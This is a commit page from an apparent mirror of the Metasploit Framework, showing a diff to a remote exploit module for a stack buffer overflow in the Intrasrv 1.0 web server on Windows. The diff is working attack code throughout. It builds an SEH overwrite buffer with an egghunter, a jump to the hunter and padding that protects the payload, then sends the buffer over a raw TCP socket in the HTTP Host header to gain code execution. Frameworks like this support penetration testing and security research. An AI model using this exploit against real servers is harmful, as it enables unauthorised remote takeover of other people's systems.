infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Use tcp mixin/clean corrupt bytes

bug/bundler_fix
Nathan Einwechter 2013-08-12 15:12:15 -04:00
parent 7854c452d2
commit 28f030494e
1 changed files with 26 additions and 18 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

44
modules/exploits/windows/http/intrasrv_bof.rb
View File

@ -10,7 +10,7 @@ require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter include Msf::Exploit::Egghunter
def initialize(info={}) def initialize(info={})
@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
], ],
'Payload' => 'Payload' =>
{ {
'Space' => '4660',
'StackAdjustment' => -3500, 'StackAdjustment' => -3500,
'BadChars' => "\x00" 'BadChars' => "\x00"
}, },
@ -60,12 +61,16 @@ class Metasploit3 < Msf::Exploit::Remote
end end
def check def check
res = send_request_cgi({ begin
'method' => 'GET', connect
'uri' => "/" rescue
}) print_error("Could not connect to target!")
return Exploit::CheckCode::Safe
end
sock.put("GET / HTTP/1.0\r\n")
res = sock.get
if res and res.headers['Server'] =~ /intrasrv 1.0/ if res =~ /intrasrv 1.0/
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
else else
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
@ -75,27 +80,30 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit def exploit
# setup egghunter # setup egghunter
hunter,egg = generate_egghunter(payload.encoded, payload_badchars, { hunter,egg = generate_egghunter(payload.encoded, payload_badchars, {
:checksum => true :checksum=>true, :eggtag=>"w00t"
}) })
# setup buffer # setup buffer
buf = rand_text(target['Offset']-128) # junk to egghunter buf = rand_text(target['Offset']-126) # junk to egghunter at jmp -128
buf << make_nops(8) + hunter # nopsled + egghunter at offset-128 buf << hunter # egghunter
buf << rand_text(target['Offset']-buf.length) # more junk to offset buf << rand_text(target['Offset']-buf.length) # more junk to offset
buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter buf << "\xeb\x80\x90\x90" # nseh - jmp -128 to egghunter
buf << [target.ret].pack("V*") # seh buf << [target.ret].pack("V*") # seh
# Setup payload # Setup payload
shellcode = rand_text(50) # pad payload shellcode = egg
shellcode = egg + egg # attach egg tags # second last byte of payload gets corrupted - pad 2 bytes
shellcode << payload.encoded # so we don't corrupt the actual payload
shellcode << rand_text(2)
msp = pattern_create(20000)
print_status("Sending buffer...") print_status("Sending buffer...")
send_request_cgi({ # Payload location is an issue, so we're using the tcp mixin
'method' => 'GET', # instead of HttpClient here to maximize control over what's sent.
'uri' => "/", # (i.e. no additional headers to mess with the stack)
'vhost' => buf, connect
'data' => shellcode sock.put("GET / HTTP/1.0\r\nHost: #{buf}\r\n#{shellcode}")
}) disconnect
end end
end end